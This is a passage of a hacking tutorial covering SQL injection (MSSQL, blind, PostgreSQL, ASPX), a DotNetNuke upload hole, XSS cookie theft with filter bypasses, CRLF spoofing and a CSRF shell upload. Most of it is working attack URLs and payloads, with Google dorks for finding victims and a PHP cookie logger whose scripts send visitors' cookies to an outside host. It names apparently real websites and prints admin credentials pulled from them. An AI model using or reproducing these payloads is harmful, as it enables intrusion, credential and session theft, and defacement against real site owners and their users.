Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/sr/page/member.asp, line 38

and from here we can see database version.

3) Finding table name

With MSSQL Injection it is not possible to get all tables at once, we must go 1 by 1.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3
+from+information_schema.tables --

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Country' to a column of data type int.

/sr/page/member.asp, line 38

and we can see that we have a table called 'Country'.

Now we have to find other tables. We are going to use not+in function. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3
+from+information_schema.tables +where+table_name+not+in('Country') --

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Admin' to a column of data type int.

/sr/page/member.asp, line 38

and from here we can see that we have a Admin table.

4) Finding column name

It is same for columns. We can not get all columns at once, so we have to do it 1 by 1. In this
case we will use where+table_name='Admin'--. So we have link:
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,
3+from+information_schema.colum ns+where+table_name='Admin' --

and we have error:
Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'USERNAME' to a column of data type int.

/sr/page/member.asp, line 38

From here we can see that we have column USERNAME. Now we need rest of the columns so
we gonna use again not+in function.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,
3+from+information_schema.colum
ns+where+table_name='Admin'+and+column_name+not+in('USERNAME') --

and we get:
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'PASSWD' to a column of data type int.

/sr/page/member.asp, line 38

So columns is PASSWD.

5) Taking data from columns

Now we have to put name of table instead of table_name and everything after from we are
entering the name of the table.
Code:
http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+f
rom+Admin--

We get username OjuZwqAul.

It is same for password:
Code:
http://www.site.com/sr/pa ge/member.asp?id=234+union+select+all+1,PASSWD,3+fro
m+Admin--

We get password M7sWt2!2uq.

Blind SQL Injection :

1) Blind SQL Injection?

Difference between SQL Injection and Blind SQL Injection is that Blind SQL Injection is not
writing any errors, any table and column names or column content. So that is why it is called
Blind SQL. You are just messing with part of site disappearing - image, text, etc... In Blind
Injection we don't use --i/* */.

2) Site vulnerability check

We have link:
Code:
http://www.site.com/index.php?id=1

We will add and 1=2
Code:
http://www.site.com/index.php?id=1+and+1=2

If any part of page disappear, it means that site is vulnerable.

3) Finding database version

As we said already in this method nothing is gonna be showed, so we gonna say that database
version is 4. If part of site disappear it means that version is not 4, but if everything on page stay
as it should it means that version is 4. We gonna use function @@version.
Code:
http://www.site.com/index.php?id=1+and+substring(@@version,1,1)=4

If page is loaded as it should then version is 4, if not, then we will try:
Code:
http://www.site.com/index.php?id= 1+and+substring(@@version,1,1)=5

4) MYSQL user

First we will check are we able to use select because it is blocked sometimes.
Code:
http://www.site.com/index.php?id=1+and+(select+1)=1

If page is loaded normally we can use select, but if not then we can't use it. Now we will check
do we have MYSQL user access.
Code:
http://www.site.com/index.php?id=1+and+(SELECT+*+from+mysq.user+limit+0,1)=1

Same as everything else, if page is loaded normally we have access to mysql.user, if not then we
don't have. mysql.user is useful to get hash password or use load_file() and OUTFILE.

5) Finding table name

To find table names all we have to do is guess. First we gonna find table name then after column
name from table.
We have link and we are gonna try to get names of different tables. If page is loaded normally it
means that table name is there and exists.
Code:
http://www.site.com/index.php?id=1+and+(select+1+from+ime_tabele+limit+0,1)=1

Our main objective is to to find data from admin table, we can also use:
Code:
admin
administrator
member
login
members
adm
user
users
tbl_admin

6) Finding column name

Now when we found name of table we wanted it is time to find column name. We doing same as
for table. There is name matching, if page is loaded normally then column exists. We need
logging data so commonly columns gonna be:
Code:
username
admin
admin_username
uname
user
nick
password
pwrod
admin_password
pw
pass

Link that we use for columns is:
Code:
http://www.sajt.com/index.php?id=1+and+(select+substring(concat(1,i me_kolone)
,1,1)from+ime_tabele+li mit+0,1)=1

7) Taking data from columns

In whole Blind SQL this gonna be most bored and longest part. Here we gonna need ASCII
table.
Code:
http://www.asciitable.com/

We will look only for DEC and CHR ASCII tables. First we gonna get username, getting letter
by letter. So we need to guess DEC for some letter, e.g. for A it is 65.
We have link:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ limit+0,1)1,1))>from DEC number

If page load normally we found are real letter for username. To find our second letter change
+limit+0,1 to +limit+1,1.
So now we are guessing second letter... It is same for password... So after long long time we get
username and password. If there is more users and if you want to get their passwords too you
will have to add where function.
So it should look like:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ where+column_name=something+limit+0,1)1,1))>from DEC
letter

To use where for second column_name we usually using id, but we can also use other stuff. e.g.
for id:
Code:
http://www.site.com/index.php?id=1+and+ascii(substring((select+concat(column_
name)+from+column_name+ where+id=1+limit+0,1)1,1))>from DEC letter

8) Taking data from columns using sqlmap

As you noticed already that you need a lot of time to get data from columns I would suggest you
to use sqlmap.
Download:
Code:
http://sqlmap.org/

Python download:
Code:
http://www.python.org/download/

Now we have to find directory where sqlmap is located.
Start>run>cmd and find sqlmap directory using cd function.
Function to start sqlmap for getting data with Blind SQL Injection for windows is:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name)"

NOTE: for unix put python before sqlmal.py
So it should look like:
Code:

python sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name)"

If there is more users as I said then use id:
Code:
sqlmap.py -u "http://site.com/index.php?id=1" -p id -a "./txt/user-
agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT
concat(name_username_columns,0x3a,name_password_columns) from table_name
where id=1)"

After -u you put link.
After -p you put parameter which is vulnerable (in our case id).
-a we are using for some random user agen-t from txt/user-agents.txt
-v1 is verbose
After --string stavljamo something that sqlmap is gonna recognize that he found letter (some part
of text who dissapear if case is false).
-e is command that we want to execute. In our case this one:
Code:
SELECT concat(name_username_columns,0x3a,name_password_columns) from
table_name where userid=1

Postgre SQL Injection :

1) Postgre SQL Injection?

Postgre SQL Injection is almost same as SQL Injection. Difference is in Postgre base, not
MySQL. It is a bit complicated attack then usually SQL Injection. There is some other functions
that we will use, you will see.

1) Finding vulnerable sites

Finding site vulnerability is same as usual SQL Injection, which means that we can use Google
dorks.
Here is some:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

You found site that may be vulnerable. To check if site is vulnerable we will add ' at end of link.
Code:
http://www.link.com/page.php?page=1'

So if on page we get:
Code:
Warning: pg_query() [function.pg -query]: Query failed: ERROR: syntax error at
or near

or some part of page disappear then site is vulnerable.

4) Finding number of columns

So we know that site is vulnerable, now we need to find column number. We will do it with
union function this time.
Our link:
Code:
http://www.link.com/page.php?pa ge=1+union+select+all+null --+-

If page is loaded normally that means that there is more columns.
Code:
http://www.link.com/page.php?page=1+union+select+all+null,null,null,null from
dual--

We are adding null all the time till we get error. If we get error with 7 null, it means that we have
6 columns, which means 6 nulls.

5) Finding vulnerable columns

It is just so easy to find column vulnerability. Null = 0, which means that everything you put
instead of certain null, if nothing happens it means that columns is not usable. That is how we
gonna find vulnerable column.
So:
Code:
http://www.link.com/page.php?page=1+union+select+all+current_database(),null,
null,null--+-

If there is nothing listed, it means that column is not usable we will move on next, and this one
back to null.

6) Finding database version

We are doing this with version() function.
Link will show us the version:
Code:
http://www.link.com/page.php?page=1+union+select+all+version(),null,null,null
--+-

we will get something like:
Code:
PostgreSQL 9.0.4 on i486 -pc-linux-gnu, compiled by GCC gcc -4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32 -bit

7) Finding table name

Same as usual SQL Injection, only diff. is that instead of column number we have null.
So it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all
table_name,null,null,null+from+information_schema.tables --+-

We will get table names also the columns from tables.

8) Finding column name

It is also easy, and there is no big difference.
This is how it should look like:
Code:
http://www.link.com/page.php?page=1+union+select+all
column_name,null,null,null+from+information_schema.columns+where+table_name=u
ser s--+-

Sometimes this wont work so we need to convert = from ascii in decimal.
You can use this site:

Code:
http://easycalculation.com/ascii -hex.php

So we have link:
Code:
http://www.link.com/page.php?page=1+union+select+all+column_name,null,null,nu
ll+from+information_sch ema.columns+where+table_name||CHR(61)||users --+-

9) Taking data from columns

Also almost same as usual SQL Injection:
Code:
http://www.link.com/page.php?page=1+union+select+all+username||CHR(58)||passw
ord+from+users--+-

Error based Postgre SQL Injection :

1) Error based Postgre SQL Injection?

Error based Postgre SQL Injection is type of web attack releated to Postgre SQL base. Difference
is that you can get all tables, columns and values from columns etc. As title says attack is based
on errors, and all results will be shown in errors.

2) Finding vulnerable sites

Use Google dorks:
Code:
inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check

Add ' at end of link:
Code:
http://www.link.com/page.php?page=1'

so if we get:
Code:
Warning: pg_query() [function.pg-query]: Query failed: ERROR: syntax error at
or near

site is vulnerable.

4) Finding database version

Use version() function. In this type of attack query looks a bit complicated then usual SQL
Injection so don't get confused.
Code:
http://www.link.com/page.php?page=1+and+1=cast(version()+as+int) --

If function is loaded successfully you will get this on page:
Code:
Warning: pg_query() [function.pg -query]: Query failed: ERROR: invalid input
syntax for integer: "PostgreSQL 9.0.4 on i48 6-pc-linux-gnu, compiled by GCC
gcc-4.4.real (Ubuntu 4.4.3 -4ubuntu5) 4.4.3, 32 -bit"

from where we get database version:
Code:

PostgreSQL 9.0.4 on i486 -pc-linux-gnu, compiled by GCC gcc -4.4.real (Ubuntu
4.4.3-4ubuntu5) 4.4.3, 32 -bit

5) Finding table name

As I said at start we are not able to get all tables in same time so we gonna use limit and offset
functions.

We will use offset to say which result from base we want to list.
Our link:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_n ame+from+inform
ation_schema.tables+lim it+1+offset+0)+as+int) --

on page we will get this error:
Code:
Warning: pg_query() [function.pg -query]: Query failed: ERROR: invalid input
syntax for integer: "pg_type"

from this we have table pg_type.

to get next table we gonna change offset to 1:
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+table_name+from+inform
ation_schema.tables+lim it+1+offset+1)+as+int) --

and we gonna get table like pg_attribute.

6) Finding column name

First you have to do is to convert table name into decimal.
We will use:
Code:
http://easycalculation.com/ascii -hex.php

type string admin and you will get decimal code:
Code:
97 100 109 105 110

We will change this code a bit, so it should look like this:
Code:
CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)

Now we will put it for table names and get columns.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+column_name+from+infor
mation_schema.columns+w
here+table_name=CHR(97)+||+CHR(100)+||+CHR(109)+||+CHR(105)+||+CHR(110)+limit
+1 +offset+0)+as+int)--

and we will get column id. We gonna change offset all the time till site back us on home page,
which means that there is no more columns in that table.

7) Taking data from columns

We found column username and password and now we want to get data from column.
Code:
http://www.link.com/page.php?page=1+and+1=cast((select+username+||CHR(58)||+p
assword+from+admin+limi t+1+offset+0)+as+int) --

and we will get this:
Code:
admin:21232f297a57a5a743894a0e4a801fc3

CHR(58) presents two points ( and we use to get two columns at same time.

NOTE: (Regard to whole tutorial) from now I'm not gonna explane it detailed, 'cause I think you
should figure it out till now already. So I'm gonna use pics and codes only.

SQL Injection on ASPX :

1) Site vulnerability check

Vulnerable link:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton

We will add order by 1--:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535&Prod=SilkCotton order by 1 --

If you get page error go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535

2) Finding column name

Go to:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 having 1=1

3) Finding table name
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
table_name from information_schema.tables))

We want admin table, so we type next:
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(sel ect top 1
table_name from information_schema.tables where table_name not in
('Tab_FinalOrder')))

admin table name is AdminMaster

4) Finding columns in admin table

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name =
'AdminMaster'))

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
column_name from information_schema.columns where table_name = 'AdminMaster'
and column_name not in ('Admin_name')))

Columns names:

5) Finding username and password
Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_name from AdminMaster))

Code:
http://pothys.com/ImageDisplay.aspx?Id=1535 and 1=convert(int,(select top 1
Admin_password from AdminMaster))

Code:
Username: admin
Password: pothys!@#

Dot net nuke :

DNN is gallery where you can upload on site and in there you can hold pictures and have like
"online gallery". That gallery have hole in itself so you can use it to upload files on site with
extension: *.gif, *.jpg, *.pdf, *.txt, *.swf..

Google dork to find vulnerable sites:
Code:
inurl:fck/fcklinkgallery.aspx

I'm going to use this site:
Code:
http://kellyballancephotography.com/providers/htmleditorproviders/fck/fcklink
gallery.aspx

Now if page is loaded it will look like this:

which means that we can continue. Now we choose option 3 -> File (A File On Your Site) and
we type javascript to upload file.
Code:

javascript:__doPostBack('ctlURL$cmdUpload','')

Choose File and Text button Upload Selected File will show up.

*on this site letter color matched with background so you will have to select whole page
(CTRL+A) and you will see upload button.

Upload file and access it by going to sitelink.com/portals/0/filename.extension
->
Code:
http://kellyballancephotography.com/portals/0/config.txt

XSS :

1) XSS?

XSS lets attacker to execute Javascript code. XSS is shortcut of Cross Site Scripting.
You can use XSS for many ways. For simple Javascript executing commands, or you can use it
to steal cookies. We are Injecting Cookies so we can login somewhere w/o password.

2) Required stuff

Mozila FireFox:
Code:
http://www.mozilla.org/en -US/products/download.html?product=firefox -
3.0.5&os=win&lang=en -GB

Add-on Firebug:
Code:
https://addons.mozilla.org/en -US/firefox/addon/firebug/

Add-on FireCookie:
Code:
https://addons.mozilla.org/en -US/firefox/addon/firecookie/

Add-on Live HTTP Headers:
Code:
https://addons.mozilla.org/en -
US/firefox/downloads/file/28118/live_http_headers -0.14-fx+sm.xpi

It is recommended to have primary knowledge of Javascripts.

3) Testing XSS vulnerability

Sites on which we can use this method are sites where is text input and submit button and on
sites where you can use GET method to print something.
e.g. of GET method:
Code:
www.sitecom/index.php?page=<script>alert("XSS ")</script>

Command to check site vulnerability is:
Code:
<script>alert("XSS")</script>

Now I will explain what this command is doing:
<script> - opening script tag
alert("XSS") - window will pop-up saying "XSS"

</script> - close script tag

4) XSS types

Cookie Stealing - we are stealing cookies from some user (commonly admin), and input cookie
in our browser so when we login to site we are gonna be logged in alrdy.
Cross-Site Request Forgery - we are sending some commands without knowing username.
XSS Worms - it is "evil" script that have possibility to spread over whole site.
Door-Forwarding - script makes iframe which will exploit something or start download some
virus, rat, keylogger, istealer, etc...
Keylogging - you know what keylogging is.

5) Cookie Stealing

For cookie stealing we will need:
-Vulnerable site
-Web-host for scripts
-php script

attach this script on some hosting:

cookie.php
Code:
<?php

$cookie =
$HTTP_GET_VARS["cookie"];

$file = fopen('cookielog.txt',
'a');
fwrite($file,
$cookie."\n");

?>

script executing:
Code:
<script>document.location="http://www.link.com/cookie.php?cookie=" +
document.cookie;</script>
ili
<script>location.href="http://www.link.com/cookie.php?cookie=" +
document.cookie;</script>
ili
<script>window.open('http://www.link.com/cookie.php?cookie=' +
document.cookie;)</script>
ili
<script>window.location='http://www.link.com/cookie.php?cookie=' +
document.cookie;</script>

How this works?

When some user log on page with your cookie logger and you save his cookie. Then we take
cookie and use it. So here is how we do it:

1) Open Mozilla
2) Open Add-on Fire bug

3) Type cookie name and value. Here is one:
Code:
PHPSESSID=db3e4e100ab6bb912de1b80c4eed7898
from this cookie title is PHPSESSID
from this cookie value is b3e4e100ab6bb912de1b80c4eed7898

6) Filter bypassing

1) Deleting script tag
e.g. if we type <script>alert("XSS")</script> and he put only command alert("XSS"). This script
delete tags <script> and </script>
Here is also how to bypass protection: Instead of <script>alert("XSS")</script> we will add
<scr<script>ipt>alert("XSS")</scr</script>ipt>

2) magic_quotes
Explained here:
Code:
http://en.wikipedia.org/wiki/Magic_quotes

If you type <script>alert("XSS")</script> and it prints <script>alert(\"XSS\")</script> then it is
magic_quotes protection.
It is a bit harder to bypass magic_quotes protection. It works over String.fromCharCode.
Here is example:
This is link of our cookie logger: http://link.com/cookie.php we would use
<script>location.href="http://www.link.com/cookie.php?cookie=" + document.cookie;</script>
into:
Code:
<scr<script>ipt>location.href=String.fromCharCode(104,116,116,112,58,47,47,11
9,119,119,46,108
,105,110,107,46,99,111,109,47,99,111,111,107,105,101,46,112,104,112,63,99,111
,1 11,107,105,101,61,)+document.cookie;</scr</script>ipt>

This works when you add \ code ' or " and when you use integer you do not use ' or "

and here: http://www.link.com/cookie.php?cookie= we also converted decimal code with this
tool:
Code:
Ascii to Decimal
http://pookey.co.uk/b inary.php

6) Bypass XSS Filters
[1] Types of filters :

[+]Bypass magic_quotes_gpc (if it's on )
[+]Bypass with cryption in full html
[+]Bypass with Obfuscation
[+]Bypass with trying around method

[+]Bypass magic_quotes_gpc

When magic_quotes_gpc is on, it means that the server doesn't allow, ", / and ' (it
depends)

to bypass it we use :
String.fromCharCode()
We write our code, in the () crypted in ASCII
exemple :
String.fromCharCode(107, 51, 110, 122, 48)
(Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48
And we use it :
<script>String.fromCharCode(107, 51, 110, 122, 48)</script>
We will see : k3nz0
We bypassed magic_quotes_gpc :)

[+] Bypass with cryption in full html :

Very simple, we have to encode our code in full HTTP!
Our code : <script>alert('i am here')</script>
And in full HTTP :
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%6
1%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E

Now, you can inject it :) !
Notice that you can use the tool "Coder" to do encode it in full HTTP
We bypassed filter.

[+] Bypass with Obfuscation :

Very simple too, this filter, don't allows for exemple these words :
-script
-alert

To bypass it, you change "script" with for exemple "sCriPt", and "alert" with
"ALerT" !
For exemple :
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter.

[+] Bypass with trying around method :

Generally, it is in the searchs scripts, we just add "> at the begining to close current
fields : exemple :
http://target.com/search.php?search="><script>alert("hello")</script>

7) XSSER Framework

Download : http://sourceforge.net/projects/xsser/
Usage
xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final
Injection(s)]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-s, --statistics show advanced statistics output results
-v, --verbose verbose (default: no)
--gtk launch XSSer GTK Interface

*Special Features*:
You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
--imx=IMX create a false image with XSS code embedded
--fla=FLASH create a false .swf file with XSS code embedded

*Select Target(s)*:
At least one of these options has to be specified to set the source to get target(s) urls from.
You need to choose to run XSSer:
-u URL, --url=URL Enter target(s) to audit
-i READFILE Read target URLs from a file
-d DORK Process search engine dork results as target urls

--De=DORK_ENGINE
Search engine to use for dorking (bing, altavista,
yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
See dork.py file to check for available engines)

*Select type of HTTP/HTTPS Connection(s)*:
These options can be used to specify which parameter(s) we want to use like payload to inject code.
-g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
-p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
-c CRAWLING Number of urls to crawl on target(s): 1-99999
--Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)

*Configure Request(s)*:
These options can be used to specify how to connect to target(s) payload(s).
You can select multiple:
--cookie=COOKIE Change your HTTP Cookie header
--user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default NONE)
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--timeout=TIMEOUT Select your Timeout (default 30)
--delay=DELAY Delay in seconds between each HTTP request (default 8)
--threads=THREADS Maximum number of concurrent HTTP requests (default 5)

--retries=RETRIES Retries when the connection timeouts (default 3)

*Select Vector(s)*:
These options can be used to specify a XSS vector source code to inject in each payload.
Important, if you don't want to try to inject a common XSS vector, used by default.
Choose only one option:
--payload=SCRIPT OWN - Insert your XSS construction -manually-
--auto AUTO - Insert XSSer 'reported' vectors from file

*Select Bypasser(s)*:
These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on
target(s) code and some IPS rules, if the target use it.
Also, can be combined with other techniques to provide encoding:
--Str Use method String.FromCharCode()
--Une Use function Unescape()
--Mix Mix String.FromCharCode() and Unescape()
--Dec Use Decimal encoding
--Hex Use Hexadecimal encoding
--Hes Use Hexadecimal encoding, with semicolons
--Dwo Encode vectors IP addresses in DWORD
--Doo Encode vectors IP addresses in Octal
--Cem
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

*Special Technique(s)*:
These options can be used to try to inject code using different type of XSS techniques. You can select
multiple:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)
--Ind IND - HTTP Response Splitting Induced code
--Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)

*Select Final injection(s)*:
These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want
to exploit on-the-wild your discovered vulnerabilities.
Choose only one option:
--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--Doss DOSs - XSS Denial of service (server) injection
--Dos DOS - XSS Denial of service (client) injection
--B64 B64 - Base64 code encoding in META tag (rfc2397)

*Special Final injection(s)*:
These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select
multiple and combine with your final code (except with DCP code):
--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code

*Miscellaneous*:

--silent inhibit console output results
--update check for XSSer latest stable version
--save output all results directly to template (XSSlist.dat)
--xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
--publish output 'positives' to Social Networks (identi.ca)
--short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
--launch launch a browser at the end with each XSS discovered

Example :

* Simple injection from URL:

$ python xsser.py -u "http://host.com"
-------------------
* Simple injection from File, with tor proxy and spoofing HTTP Referer headers:

$ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
-------------------
* Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads
character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):

$ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
-------------------
* Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first,
change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third,
reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to
"20" and using multithreads (5 threads):

$ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20"
--threads "5"
-------------------
* Advance injection from File, payloading your -own- payload and using Unescape() character
encoding to bypass filters:

$ python xsser.py -i "urls.txt" --payload
'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
-------------------

* Injection from Dork selecting "duck" engine (XSSer Storm!):

$ python xsser.py --De "duck" -d "search.php?"
-------------------
* Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):

$ python xsser.py -c3 --Cw=4 -u "http://host.com"
-------------------
* Simple injection from URL, using POST, with statistics results:

$ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
-------------------
* Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP
Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
-------------------
* Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM
shadow space (no server logging!) and if exists any "hole", applying your manual final payload
"malicious" code (ready for real attacks!):

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code
here!"
-------------------
* Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link
(is.gd) with a valid DoS (Denegation Of Service) browser client payload:

$ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
-------------------
* Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic
payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between
petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie
parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and
creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):

$ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --
Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
-------------------
* Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to
be uploaded.

$ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
-------------------
* Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.

$ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
-------------------
* Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to

http://identi.ca
(federated XSS pentesting botnet)

$ python xsser.py -d "login.php" --De "duck" --publish

-------------------
* Create a .swf movie with XSS code injected

$ python xsser.py --fla "name_of_file"
-------------------
* Send a pre-checking hash to see if target will generate -false positive- results

$ python xsser.py -u "host.com" --hash
-------------------
* Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed
in a shortered link, on positive results founded. XSS real-time exploiting.

$ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
-------------------
* Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.

$ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
-------------------
* Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser
directly

$ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch

CRLF :

1) CRLF?

Shortcut from Carriage Return and Line Feed. CRLF is very easy to use. It is actually like we are
adding new row (\n).

2) Vulnerable places

Vulnerable places are anywhere. In this tut. I'm gonna use some chat.

3) Exploiting vulnerability and protection

Lets say if you send message chat will look like this:
Code:
1.4.2012 10:29 - fodex: Why login page is down?
1.4.2012 10:29 - saiR: Look like somebody deleted login database.
1.4.2012 10:29 - Admin: I'm gonna check this out and will announce you.
1.4.2012 10:30 - saiR: Ok go ahead... \n1.4.2012 10:30 - Admin: You are right
saiR login database is deleted. Log in here till I get it back:
http://vulnerablesite.com/login.php

If chat is vulnerable, it's gonna look like this:
Code:
1.4.2012 10:30 - saiR: Ok go ahead...
1.4.2012 10:30 - Admin: You are right saiR login database is deleted. Log in
here till I get it back: http://vulnerablesite.com/login.php

We wrote second msg from Admin and users will think that Admin sent it actually and will log
in to site we gave them. With login we are gonna keylog site logins.

4) Vulnerable script

e.g.
Code:
<?php
if(isset($_POST['send_message']))
{
if(!empty($_POST['message']))
{
$message = htmlspecialcha rs($_POST['message']);
// rest code to send msg
}
}
?>

CSRF :

1) CSRF?

Shortcut from Cross Site Request Forgery. CSRF is mix of XSS and LFI. It is used to execute
something without knowing username.

2) Vulnerable places

Can be used when you are using GET method. If CSRF is dont successfully, attacker can change
password of some user. Most common vulnerable places are avatars.

3) Exploiting vulnerability

Lets say we have profile link:
Code:
http://www.link.com/profile.php

Where you can see user data (username, avatar, email...).
Now when user want to edit his profile using e.g.
Code:
http://www.link.com/edit_profile.php

Now instead of avatar link we gonna add link from profile editing together with new code using
GET method.

NOTE: We have to use GET method during profile editing otherwise we wont be able to attack.

Add avatar link:
Code:
http://www.link.com/edit_profile.php?password=newpassword

password is name of input (It can be different, it's best to chekc source code)

Now when we look at avatar we wont be able to see picture (like there is no picture). When other
user watch your avatar, if attack was successful, his password is gonna be changed in one we put.

4) Example Of CSRF File Uploading Vulnerability.

1. Wordpress Amplus Themes CSRF File Upload Vulnerability
2. Wordpress Dimension Themes CSRF File Upload Vulnerability
3. Wordpress Euclid V1 Themes CSRF File Upload Vulnerability
4. Wordpress thecotton v114 Themes CSRF File Upload Vulnerability

1. Wordpress Amplus Themes CSRF File Upload Vulnerability

Dork :

inurl:wp-content/themes/amplus

Exploit & POC :

http://site-target/wp-content/themes/amplus/functions/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php"
method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

File Access :

http://site-target/uploads/[years]/[month]/your_shell.php
